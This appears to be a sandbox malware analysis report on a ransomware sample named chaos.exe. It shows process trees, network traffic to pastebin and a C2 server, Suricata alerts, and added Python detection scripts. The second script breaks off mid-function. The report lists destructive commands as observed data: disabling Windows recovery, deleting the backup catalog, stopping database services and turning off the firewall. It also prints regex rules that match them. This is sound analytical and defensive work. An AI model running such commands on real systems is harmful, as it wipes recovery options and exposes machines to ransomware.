to allocate memory for pSid.GetCurrentUserSID():failed to allocate memory for wsDomainName.GetCurrentUserSID():LookupAccountName() failed.GetCurrentUserSID():ConvertSidToStringSid() failed.thsnYaVieBodaEncrypted by Adobe.0123456789ABCDEFEncryption failed.failed to copy command line into SM: command line: ARM update folder: session id: failed to get session id: unable to create SMEmpty Command Line or User NameGetFinalCommandLineForSM...1.701.999.9999unable to determine service version: installed service is legacy version /Svc /USER:cmd line limit reached for legacy service: final cmd line limit is reached: final cmd line for arm next service: \Adobe\ARM\1.0\armsvc.exefound service version: IsAnyProductInFullAuto...{A6EADE66-0000-0000-484E-7E8A45000000};{AC76BA86-0000-0000-7760-7E8A45000000};{AC76BA86-0000-0000-BA7E-7E8A45000000}policy disabled for: eula not accepted for: in found full auto for: in Modefound product in full auto: Comctl32LoadIconMetricServer to set iNotify value in HKEY_CURRENT_USER: Server (RegSetValueEx) failed to set iNotify value in HKEY_CURRENT_USERServer (RegOpenKeyEx) failed to set iNotify value in HKEY_CURRENT_USERIsHighBeamAllowed...allowed version list emptyinstalled version: confirmed allowed versionallowed version not confirmedunable to determine version: missing: Entered WaitForEvent Event signaledEvent timed outEvent wait failedIDS_TOOLTIP_MODE_FILES_IN_USEnot ignorable file is in use, will try to Upgrade laterCannot start Upgrade - not appropriate mode or MSI busyAttemptUpgrade...already processedauto-upgrade not availablewill not attemp upgrade, will attempt upgrade when possible, WaitFilesInUse in progressmode is not MODE_UPGRADES_FOUNDGetAutoUpgradeStatus...returning auto upgrade status: not MODE_UPGRADES_FOUND modeInitAutoUpgradeDaysRemaining... 
already initializedSetRegKeyDW failed - SetRegKeyDW succeeded - autoupgradeclockstartedProcessOptOutOrRemindMeLater...will not dismiss, will not dismiss - not appropriate modeping: http://armmf.adobe.com/arm-manifests/win/empty version in ping url.txtfailed to get Temp folderping result: XPathSelectionLanguageNewParserAllowXsltScriptAllowDocumentFunction[local-name(.) = '%s']child::*RSDS D:\CB\ARM_Main\BuildResults\bin\Win32\Release\AdobeARM.pdb" - source
- File/Memory
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\RasPbFile"
"\Sessions\1\BaseNamedObjects\Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
"Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
"RasPbFile" - source
- Created Mutant
- relevance
- 3/10
-
GETs files from a webserver
- details
-
"GET /ip-provider.php HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: www.sfml-dev.org
user-agent: libsfml-network/2.x"
"GET /raw/eEpt6UrD HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: pastebin.com
user-agent: libsfml-network/2.x" - source
- Network Traffic
- relevance
- 5/10
-
Opened the service control manager
- details
-
"net1.exe" called "OpenSCManager" requesting access rights "0X0"
"net1.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1) - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1035 (Show technique in the MITRE ATT&CK™ matrix)
-
Overview of unique CLSIDs touched in registry
- details
-
"netsh.exe" touched "Nap Config Read class" (Path: "HKCU\WOW6432NODE\CLSID\{EA4A0A43-1C8F-4C7B-A4B1-28ECBD96BA8C}")
"netsh.exe" touched "Quarantine Agent Management class" (Path: "HKCU\WOW6432NODE\CLSID\{EB082BA1-DF8A-46BE-82F3-35BF9E9BE52F}")
"netsh.exe" touched "HNetCfg.FwMgr" (Path: "HKCR\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}") - source
- Registry Access
- relevance
- 3/10
-
Runs shell commands
- details
-
"%WINDIR%\system32\cmd.exe /c net stop SQLWriter" on 2020-4-12.22:57:36.771
"%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" on 2020-4-12.22:57:37.053
"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" on 2020-4-12.22:57:37.350
"%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" on 2020-4-12.22:57:37.693
"%WINDIR%\system32\cmd.exe /c net stop MSDTC" on 2020-4-12.22:57:38.193
"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" on 2020-4-12.22:57:38.568
"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no" on 2020-4-12.22:57:38.693
"%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" on 2020-4-12.22:57:39.068
"%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" on 2020-4-12.22:57:39.225
"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" on 2020-4-12.22:57:39.568
"%WINDIR%\system32\cmd.exe /c net stop vds" on 2020-4-12.22:57:40.146
"%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off" on 2020-4-12.22:57:40.475
"%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable" on 2020-4-12.22:58:21.662 - source
- Monitored Target
- relevance
- 5/10
- ATT&CK ID
- T1059 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLWriter" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLWriter" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLBrowser" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLBrowser" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQL$CONTOSO1" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspo ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenab ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLWriter" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLWriter" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLBrowser" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLBrowser" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQL$CONTOSO1" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspo ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenab ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistence
-
Dropped files
- details
-
"AutoIt3_x64.exe" has type "data"
"603jOLdO.exe" has type "data"
"AUDIOSEARCHMAIN.DLL" has type "data"
"5F7TBCLUxJG.doc" has type "data"
"AcroRd32.exe" has type "data"
"ACEWDAT.DLL" has type "data"
"Adobe AIR Application Installer.swf" has type "data"
"ant-javafx.jar" has type "data"
"AdobeCollabSync.exe" has type "data"
"AXSLE.dll" has type "data"
"AIDE.dll" has type "data"
"3LnBJn.doc" has type "data"
"ACE.dll" has type "data"
"awt.dll" has type "data"
"7zFM.exe" has type "data"
"4RHcGmkB.exe" has type "data"
"ACEDAO.DLL" has type "data"
"AdobeARM.exe" has type "8086 relocatable (Microsoft)"
"ACEES.DLL" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"chaos.exe" touched file "%WINDIR%\Globalization\Sorting\SortDefault.nls"
"chaos.exe" touched file "%WINDIR%\AppPatch\sysmain.sdb"
"chaos.exe" touched file "%WINDIR%\SysWOW64\cmd.exe"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\3IQVUB7J\index[3].js"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\0CH0OVJV\i[1]"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\4KBMQIHU\5[1].jpg"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\4KBMQIHU\phone[1].js"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\9DCW73ON\featured380[1].jpg"
"chaos.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SLSW3KYW\logo_header@2x[1].png" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "www.sfml-dev.org"
Heuristic match: "user@sfml-dev.org"
Heuristic match: "pastebin.com"
Heuristic match: "stevenxx134@gmail.com"
Heuristic match: "steven77xx@mail.ru and Steven77xx@protonmail.com"
Pattern match: "https://i.ibb.co/2PXVhhm/1.png"
Heuristic match: "UJZpGYz0[Fa!(';IUy7$>@niHjcQ+\^}pN5<}1-M4zZ/Wnr]A'(&+Y5`xpJmo0UJwM``.K-?lz^3y:[`o[Dv/\u8+QuD!KW`0QL??Wg}$==|8M[;0u)M+aMlE?>rB$aIi:N.Hr;/fOZ`=CC;}E_'2V77ggo^amF*^`$sZh.+pT.As"
Pattern match: "Bt.npT/phcoruDge+u?%LWwsVjJ`aJv5"
Pattern match: "aU.Ex/yrU$k"
Pattern match: "r.zQ/'1;~|"
Pattern match: "vt-0xB.vNoY/!J{z*jHrH}9\SvQeF1z"
Pattern match: "X4Nq.DKH/TR7s5"
Pattern match: "uH-tH.tH/tH0tH1tH2htH9PtH=@tH"
Pattern match: "www.7-zip.org/U"
Pattern match: "YX.wO/qliH"
Pattern match: "p.EZ/|xMS#7ZO"
Pattern match: "NfNmXrC.JG/Po[gU1/E#m81U`|p5q0J]oEcm\9,Lh%O}jL20^q%:&X\W7U{A"
Heuristic match: "o5~:GmLgyEIvX..DjxuLzLnt.fM"
Heuristic match: "<dT+QQF*Txj1K=m^NG*dIx_HSp5w,1p#-{eo+b4K3pb&L\S(f*pGXd[#`7R@.vE"
Pattern match: "ZkuGa.M7.lbj/V+d90Z&91yb"
Pattern match: "S.OApI/.Mdrc$4.r6/E@w@"
Heuristic match: "Y_^M3H]UjhQdP V3EVWPEdEjPqAjjjp0tnj#h8RMEEE;}EuCEjVPWE\0u3VjMEQPC0}ruk.Md"
Heuristic match: "Y_^[M3<]UjhQdP,V3ESVWPEdu~u_2~rjPj7WtPt=03hPfPD3fjPVSCRjjEP`C3+tftfJuuz3fxHPxTRt7h&ThPUxRjjP`r.Md"
Heuristic match: "Y>I~P*)^~(gI>[O{xgZ3MLKQ$AD=a,`(kWKo[6')l/ZMM#Ce.Dj"
Pattern match: "u.PBQj/PU|Ars\\m2hMHmEQ;}UKJW"
Heuristic match: "c6h<g;p/ax4L7~J,5zt3\A4Yd{m)#R%g`bvL0)^c,!t3Vl5u7|KSzn=cKlf8H~rp6b7q7ERd09fSJGoPFMoa.mg"
Pattern match: "eLX40.EZb/8@T\$Vb9McL.IHA3'mo9-4j.!0"
Pattern match: "t5.Xy/&c~cH0CVy\Ru$4I9"
Pattern match: "armmf.adobe.com/arm-manifests/win/http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windowshttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=WindowsSOFTWARE\Adobe\Adobe"
Pattern match: "www.adobe.com/go/update_error_winrelaunched"
Pattern match: "get.adobe.com/reader/Auto_Upgrade_Statusupgradeoffered2autoupgradeeligible2IDS_TITLE_GET_UPGRADE_NAMEIDS_TITLE_REASONS_TO_UPGRADEIDS_TITLE_UPGRADE_HIGHLIGHTSIDS_UPGRADE_REASONS_HIGHLIGHTSIDS_UPGRADE_HIGHLIGHTS"
Pattern match: "OverwriteURLs.com/ArmReport.ini[SESSION]Delete_ReportMoveEx_ReportSESSIONJ#ASOFTWARE\Adobe\Adobe"
Pattern match: "www.adobe.com/go/ARMUpgradeFailedHelpUpgrade_WhatsNewopenThe"
Pattern match: "http://armmf.adobe.com/arm-manifests/win/empty" - source
- File/Memory
- relevance
- 10/10
-
System Security
-
Creates or modifies windows services
- details
-
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\LOCALCONFIG")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\ENROLL\HCSGROUPS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\SHAS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NAPAGENT\QECS")
"netsh.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
- "netsh.exe" opened "\Device\KsecDD"
- source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Unusual Characteristics
-
Matched Compiler/Packer signature
- details
- "0b032586772c4b52ca2712d92f5a13b26051ef72a8bcdd70c98eb9faffa22425.bin" was detected as "VC8 -> Microsoft Corporation"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1045 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads information about supported languages
- details
-
"net.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"net1.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
File Details
chaos.exe
- Filename
- chaos.exe
- Size
- 998KiB (1021952 bytes)
- Type
- peexe executable
- Description
- PE32 executable (console) Intel 80386, for MS Windows
- Architecture
- WINDOWS
- SHA256
- 0b032586772c4b52ca2712d92f5a13b26051ef72a8bcdd70c98eb9faffa22425
- MD5
- 9612185e1df89f5b46a74178e882fac2
- SHA1
- 937f671736acd13913bcafb273dcd8fedc833049
- ssdeep
- 24576:0xlevelaNanydr67EEMXml8qmhCFCDTHXk4nRqw:0xQFNyyOgXmlYgsDT3k4nRqw
- imphash
- 3b7bc2e55a92576e073cf2d4e3717fec
- authentihash
- a47b49be5e9c86594e091a34a743defb387dbac727ca030f0a1049fec5b2f71c
- Compiler/Packer
- VC8 -> Microsoft Corporation
- PDB Timestamp
- 04/10/2020 16:43:50 (UTC)
- PDB Pathway
- D:\yo\chaos\Release\chaos.pdb
- PDB GUID
- 5FF75B7ADA7B4D45B775932C6DCA246F
Classification (TrID)
- 61.7% (.EXE) Win64 Executable (generic)
- 14.7% (.DLL) Win32 Dynamic Link Library (generic)
- 10.0% (.EXE) Win32 Executable (generic)
- 4.5% (.EXE) OS/2 Executable (generic)
- 4.4% (.EXE) Generic Win/DOS Executable
File Metadata
- 1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27031)
- 1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27031)
- 7 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)
- 51 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 27508)
- 37 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)
- 131 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)
- 25 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)
- File contains Visual Basic code
- File appears to contain raw COFF/OMF content
- File is the product of a small codebase (1 files)
File Sections
File Resources
File Imports
Hybrid Analysis
Analysed 32 processes in total (System Resource Monitor).
-
chaos.exe
(PID: 3396)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLWriter (PID: 2240)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLBrowser (PID: 528)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER (PID: 2184)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1 (PID: 3952)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSDTC (PID: 3796)
- cmd.exe %WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures (PID: 2936)
- cmd.exe %WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no (PID: 2588)
- cmd.exe %WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet (PID: 1972)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT (PID: 3180)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER (PID: 4068)
- cmd.exe %WINDIR%\system32\cmd.exe /c net stop vds (PID: 2980)
-
cmd.exe
%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off
(PID: 1316)
- netsh.exe netsh advfirewall set currentprofile state off (PID: 3940)
-
cmd.exe
%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable
(PID: 1976)
- netsh.exe netsh firewall set opmode mode=disable (PID: 3476)
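The command sequence in this process tree (and in the "Runs shell commands" indicator earlier in the report) is the standard pre-encryption staging of Windows ransomware: stop the SQL Server, MSDTC and vds services so their files are no longer locked, set `bootstatuspolicy ignoreallfailures` and `recoveryenabled no` so Windows will not offer automatic repair or the recovery environment after the damage, delete the backup catalog with `wbadmin`, then switch the firewall off. The Python below is an added triage script, not part of the Hybrid Analysis report or of the sample. It takes the command lines above as constructed input, classifies each with a small rule set, and only returns a positive verdict when recovery inhibition and stops of data-holding services occur together, which keeps a lone `net stop` from firing. The ATT&CK IDs in the rule table (T1490, T1489, T1562.004) are the editor's mapping; the report itself tags the block as T1059. `DATA_SERVICE_RE` is an assumed list.

```python
"""Triage sandbox command lines for ransomware pre-encryption staging."""
import re

# Constructed input: the cmd.exe command lines from the process tree above,
# copied with the %WINDIR% placeholder the sandbox prints.
REPORTED_COMMANDS = [
    r"%WINDIR%\system32\cmd.exe /c net stop SQLWriter",
    r"%WINDIR%\system32\cmd.exe /c net stop SQLBrowser",
    r"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER",
    r"%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1",
    r"%WINDIR%\system32\cmd.exe /c net stop MSDTC",
    r"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",
    r"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no",
    r"%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet",
    r"%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT",
    r"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER",
    r"%WINDIR%\system32\cmd.exe /c net stop vds",
    r"%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off",
    r"%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable",
]

# (category, ATT&CK technique, pattern). The technique IDs are the editor's
# mapping (T1490 Inhibit System Recovery, T1489 Service Stop, T1562.004
# Disable or Modify System Firewall); the report itself tags these as T1059.
RULES = [
    ("inhibit_recovery", "T1490",
     re.compile(r"\bbcdedit\b.*\b(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("inhibit_recovery", "T1490",
     re.compile(r"\bwbadmin\b.*\bdelete\s+catalog\b", re.I)),
    ("service_stop", "T1489",
     re.compile(r"\b(?:net1?|sc)(?:\.exe)?\s+stop\s+(\S+)", re.I)),
    ("firewall_disable", "T1562.004",
     re.compile(r"\bnetsh\b.*(?:advfirewall\s+set\s+\w+\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)", re.I)),
]

# Assumption: services ransomware stops so that database/backup files are no
# longer locked when it starts overwriting them.
DATA_SERVICE_RE = re.compile(r"^(?:SQL\w*|MSSQL\w*(?:\$\w+)?|MSDTC|vds|VSS|wbengine)$", re.I)
DATA_TAG = " (data/backup service)"


def strip_shell_prefix(cmdline: str) -> str:
    """Return the command that 'cmd.exe /c' actually runs."""
    return re.sub(r"^.*?cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.I).strip()


def classify(cmdline: str) -> list:
    """(category, technique, detail) tuples for one command line."""
    cmd = strip_shell_prefix(cmdline)
    hits = []
    for category, technique, pattern in RULES:
        m = pattern.search(cmd)
        if not m:
            continue
        detail = cmd
        if category == "service_stop":
            svc = m.group(1)
            detail = svc + DATA_TAG if DATA_SERVICE_RE.match(svc) else svc
        hits.append((category, technique, detail))
    return hits


def triage(cmdlines) -> dict:
    """Group hits by category; flag ransomware staging only when recovery is
    inhibited AND at least two data/backup services are stopped."""
    by_cat = {}
    for line in cmdlines:
        for category, technique, detail in classify(line):
            by_cat.setdefault(category, []).append((technique, detail))
    data_stops = [d for _, d in by_cat.get("service_stop", []) if d.endswith(DATA_TAG)]
    verdict = bool(by_cat.get("inhibit_recovery")) and len(data_stops) >= 2
    return {"hits": by_cat, "ransomware_staging": verdict}


if __name__ == "__main__":
    result = triage(REPORTED_COMMANDS)
    for category, entries in result["hits"].items():
        print(category)
        for technique, detail in entries:
            print(f"  [{technique}] {detail}")
    print("ransomware staging:", result["ransomware_staging"])
```

Run against the thirteen lines above the script reports three recovery-inhibition hits, eight service stops (all of them data/backup services) and two firewall changes, and the verdict is positive; the same rules fed a single `net stop Spooler` stay silent.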
Network Analysis
DNS Requests
Domain | Address | Registrar | Country
---|---|---|---
pastebin.com | 104.23.98.190 (TTL: 2) | ENOM, INC. (Organization: WHOISGUARD, INC.; Name Server: SUE.NS.CLOUDFLARE.COM; Creation Date: Tue, 03 Sep 2002 00:00:00 GMT) | United States
www.sfml-dev.org | 148.251.247.174 (TTL: 3599) | united-domains AG (Organization: Limbozz GmbH; Name Server: PRI.MORDAC.DE; Creation Date: Tue, 26 Feb 2008 15:26:15 GMT) | Germany
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details
---|---|---|---
148.251.247.174 | 80 TCP | chaos.exe PID: 3396 | Germany
104.23.98.190 | 80 TCP | chaos.exe PID: 3396 | United States
80.82.69.109 | 8080 TCP | chaos.exe PID: 3396 | Netherlands
HTTP Traffic
Endpoint | Request | URL
---|---|---
148.251.247.174:80 | GET | 148.251.247.174/ip-provider.php
104.23.98.190:80 | GET | 104.23.98.190/raw/eEpt6UrD
80.82.69.109:8080 | POST | 80.82.69.109/1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C

Raw requests as captured (the POST body is not included in the report):

GET /ip-provider.php HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: www.sfml-dev.org
user-agent: libsfml-network/2.x

GET /raw/eEpt6UrD HTTP/1.0
content-length: 0
from: user@sfml-dev.org
host: pastebin.com
user-agent: libsfml-network/2.x

POST /1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C HTTP/1.1
connection: close
content-length: 1720
content-type: application/x-www-form-urlencoded
from: me
host: 80.82.69.109
user-agent: libsfml-network/2.x
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 104.23.98.190:80 (TCP) | A Network Trojan was detected | ETPRO HUNTING Suspicious Terse HTTP Request to Pastebin | 2811838 |
local -> 148.251.247.174:80 (TCP) | A Network Trojan was detected | ET USER_AGENTS SFML User-Agent (libsfml-network) | 2026914 |
local -> 104.23.98.190:80 (TCP) | A Network Trojan was detected | ET USER_AGENTS SFML User-Agent (libsfml-network) | 2026914 |
local -> 148.251.247.174:80 (TCP) | Device Retrieving External IP Address Detected | ETPRO POLICY External IP Address Lookup via libsfml-network | 2838021 |
local -> 80.82.69.109:8080 (TCP) | A Network Trojan was detected | ET USER_AGENTS SFML User-Agent (libsfml-network) | 2026914 |
local -> 80.82.69.109:8080 (TCP) | Malware Command and Control Activity Detected | ETPRO MALWARE Zeropadypt/Limbo/Ouroboros Ransomware CnC Checkin M4 | 2839873 |
local -> 80.82.69.109:8080 (TCP) | Potentially Bad Traffic | ETPRO INFO HTTP Request with Lowercase connection Header Observed | 2838131 |
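The three requests in the HTTP Traffic table are what produced the seven Suricata rows above: one libsfml-network user-agent hit per destination, the terse HTTP/1.0 fetch from pastebin.com/raw/ (the pastebin paste is where the sample picks up its configuration or C2 address, a common pattern for cheap malware), the external-IP lookup, and, for the POST to 80.82.69.109:8080, a 64-hex-character path with a lowercase `connection` header. The `user-agent: libsfml-network/2.x` and `from: user@sfml-dev.org` values are the SFML networking library's defaults, which is why a vendor rule keyed on that user-agent exists. The Python below is an added example, not the report's code and not the Emerging Threats signature bodies: it parses the captured requests, re-implements each alert as a simple heuristic, and reproduces the seven rows. The SIDs are copied from the report's table; the matching logic, the extra IP-lookup path keywords in `IP_LOOKUP_PATH`, and the "at most four headers" threshold are assumptions.

```python
"""Re-derive the report's Suricata alerts from the captured HTTP requests."""
import re
from dataclasses import dataclass, field

# Constructed input: the three requests from the HTTP Traffic table, rebuilt
# as raw request text. Bodies are omitted (the report does not show them).
CAPTURED = [
    ("148.251.247.174", 80,
     "GET /ip-provider.php HTTP/1.0\r\n"
     "content-length: 0\r\nfrom: user@sfml-dev.org\r\n"
     "host: www.sfml-dev.org\r\nuser-agent: libsfml-network/2.x\r\n\r\n"),
    ("104.23.98.190", 80,
     "GET /raw/eEpt6UrD HTTP/1.0\r\n"
     "content-length: 0\r\nfrom: user@sfml-dev.org\r\n"
     "host: pastebin.com\r\nuser-agent: libsfml-network/2.x\r\n\r\n"),
    ("80.82.69.109", 8080,
     "POST /1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C HTTP/1.1\r\n"
     "connection: close\r\ncontent-length: 1720\r\n"
     "content-type: application/x-www-form-urlencoded\r\nfrom: me\r\n"
     "host: 80.82.69.109\r\nuser-agent: libsfml-network/2.x\r\n\r\n"),
]

# Signature IDs as printed in the report's Suricata table. The checks below are
# a simplified re-implementation, not the Emerging Threats rule bodies.
REPORT_SIDS = {
    "sfml_user_agent": 2026914,
    "terse_pastebin_raw": 2811838,
    "external_ip_lookup": 2838021,
    "cnc_checkin_hex64_post": 2839873,
    "lowercase_connection_header": 2838131,
}

HEX64_PATH = re.compile(r"^/[0-9A-Fa-f]{64}$")
BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Assumption: a short list of path fragments typical of "what is my IP" services.
IP_LOOKUP_PATH = re.compile(r"ip-provider|/getip|/myip|checkip", re.I)


@dataclass
class Request:
    dst_ip: str
    dst_port: int
    method: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)    # lower-cased header names
    raw_names: list = field(default_factory=list)  # header names as sent


def parse_request(dst_ip: str, dst_port: int, raw: str) -> Request:
    """Split request line and headers; body (after the blank line) is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
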